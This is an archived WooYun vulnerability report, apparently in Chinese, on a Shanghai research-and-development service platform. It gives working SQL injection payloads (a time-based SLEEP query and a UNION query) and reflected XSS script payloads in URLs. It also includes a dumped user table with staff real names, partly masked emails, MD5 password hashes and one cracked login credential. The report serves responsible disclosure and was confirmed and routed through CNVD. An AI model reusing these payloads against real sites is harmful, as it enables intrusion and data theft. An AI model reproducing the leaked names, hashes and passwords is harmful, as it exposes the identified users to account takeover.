乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-15: 细节已通知厂商并且等待厂商处理中 2015-09-17: 厂商已经确认,细节仅向厂商公开 2015-09-27: 细节向核心白帽子及相关领域专家公开 2015-10-07: 细节向普通白帽子公开 2015-10-17: 细节向实习白帽子公开 2015-11-01: 细节向公众公开
RT
上海研发公共服务平台有效整合上海及长三角地区的科技资源,通过开放仪器设备与研究基地,共享科学数据和科技文献,提供专业技术、公益培训、专家咨询等服务,促进科技资...好久没交洞了,继续连载。 1 sql注入(无限制脱库),爆出用户密码和密码,不料认证通过后页面不存在
http://**.**.**.**/btin_cms/cnt/moreCount.do?browseParam.channelName=%E4%BA%A7%E4%B8%9A%E5%8A%A8%E6%80%81&browseParam.channelName=%E4%BA%A7%E4%B8%9A%E6%94%BF%E7%AD%96%E6%B3%95%E8%A7%84%E5%92%8C%E6%A0%87%E5%87%86&browseParam.templateName=BTIN_SUMMARY&browseParam.webSymbol=btin') AND (SELECT * FROM (SELECT(SLEEP(5)))UrFp) AND ('TwOE'='TwOE
Database: btinTable: tb_cms_user[18 columns]+-------------------+---------------+| Column | Type |+-------------------+---------------+| address | varchar(500) || availability_date | date || check_articles | int(10) || created_date | datetime || creater | int(10) || description | varchar(4000) || last_edit_time | datetime || last_login_time | datetime || login_count | int(10) || name | varchar(50) || organization | varchar(500) || password | varchar(32) || phone | varchar(50) || role | varchar(20) || status | varchar(20) || submit_articles | int(10) || true_name | varchar(20) || user_id | int(10) |+-------------------+---------------+Database: btinTable: tb_cms_user[15 entries]+-------------+--------------------------+----------------------------------+-----------+---------+| login_count | name | password | true_name | user_id |+-------------+--------------------------+----------------------------------+-----------+---------+| 3 | chen_jing100@**.**.**.** | 96e79218965eb72c92a549dd5a330112 | 陈静 | 32 || 8 | dqlv@**.**.**.** | 96e79218965eb72c92a549dd5a330112 | yhju | 33 || 626 | fhuang@**.**.**.** | 96e79218965eb72c92a549dd5a330112 | 黄菲 | 27 || 1 | hwu01@**.**.**.** | a8a3d0e05801ad8e60034365f5c3b6fd | 吴慧 | 19 || 2 | hywang1213@**.**.**.** | 96e79218965eb72c92a549dd5a330112 | 王慧媛 | 15 || 51 | jgren@**.**.**.** | 96e79218965eb72c92a549dd5a330112 | 任敬歌 | 23 || 160 | jiajia@**.**.**.** | b10cbb6c51ac9ec77c8dc9f0bccdd296 | 贾佳 | 9 || 16 | jszhang@**.**.**.** | b10cbb6c51ac9ec77c8dc9f0bccdd296 | 张建设 | 28 || 33 | lbgao@**.**.**.** | 96e79218965eb72c92a549dd5a330112 | 高柳滨 | 26 || 232 | lifecenter@**.**.**.** | 96e79218965eb72c92a549dd5a330112 | sdspb | 1 || 148 | liuxiao@**.**.**.** | 0f4237dd33c1e0d930180a402c5403d6 | 刘晓 | 14 || 63 | mhli@**.**.**.** | 34018b24aaa7b894f2dee606c9edaf5f | 李明辉 | 18 || 85 | mhruan@**.**.**.** | 4ddc1311251a0d11afa4696bec7829b3 | 阮梅花 | 13 || 4 | mrq@**.**.**.** | fed86d76f8faeb4ff6e022315aa8251c | 毛汝倩 | 21 || 5 | xuerusp@**.**.**.** | 96e79218965eb72c92a549dd5a330112 | 王冬冬 | 31 |+-------------+--------------------------+----------------------------------+-----------+---------+
尝试登录,认证成功后页面不存在(什么情况?!) chen_jing100@**.**.**.**:111111
2 XSS
http://**.**.**.**:80/trace/cn/quickSearch.do?entrezWord="><script>alert(/xss/);</sCript>http://**.**.**.**:80/primer/cn/quickSearch.do?entrezWord="><script>alert(/xss/);</sCript>http://**.**.**.**:80/hotdata/cn/quickSearch.do?entrezWord="><script>alert(/xss/);</sCript>http://**.**.**.**:80/taxonomy/en/quickSearch.do?entrezWord="><script>alert(/xss/);</sCript>http://**.**.**.**:80/nucleotide/en/quickSearch.do?entrezWord="><script>alert(/xss/);</sCript>
1 SQL注入(可爆62家企业敏感信息)
注入参数为industry : http://**.**.**.**/web/changxing/changxing_fwlb.php?industry=%E6%96%B0%E8%83%BD%E6%BA%90&org_name=1&PageNo=2
http://**.**.**.**/web/changxing/changxing_fwlb.php?industry=%E6%96%B0%E8%83%BD%E6%BA%90&org_name=1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x7162716b71,0x61574876665276567442,0x716b787071)-- &PageNo=2
看看能不能得到很多敏感信息
2 XSS(非存储型)
http://**.**.**.**/web/changxing/changxing_fwlb.php?industry=%25E4%25BF%25A1%25E6%2581%25AF%25E6%258A%2580%25E6%259C%25AF%27%22%28%29%26%25%3CScRiPt%20%3Ealert%28/xss1/%29%3C/ScRiPt%3E&org_name=%E4%B8%8A%E6%B5%B7%E8%B6%85%E7%BA%A7%E8%AE%A1%E7%AE%97%E4%B8%AD%E5%BF%83
http://**.**.**.**/web/changxing/changxing_fwlb.php?industry=%25E6%2596%25B0%25E8%2583%25BD%25E6%25BA%2590%27%22%28%29%26%25%3E%3CScRiPt%20%3Ealert%28/xss2/%29%3C/ScRiPt%3E&org_name=%E4%B8%8A%E6%B5%B7%E5%A4%AA%E9%98%B3%E8%83%BD%E5%B7%A5%E7%A8%8B%E6%8A%80%E6%9C%AF%E7%A0%94%E7%A9%B6%E4%B8%AD%E5%BF%83%E6%9C%89%E9%99%90%E5%85%AC%E5%8F%B8%EF%BC%88%E4%B8%8A%E6%B5%B7%E5%B8%82%E5%A4%AA%E9%98%B3%E8%83%BD%E5%85%89%E4%BC%8F%E6%8A%80%E6%9C%AF%E5%88%9B%E6%96%B0%E6%9C%8D%E5%8A%A1%E5%B9%B3%E5%8F%B0%EF%BC%89&PageNo=2
参数过滤
危害等级:高
漏洞Rank:12
确认时间:2015-09-17 15:33
CNVD确认并复现所述情况,已经转由CNCERT下发给上海分中心,由其后续协调网站管理单位处置。按多个风险评分,rank 12
暂无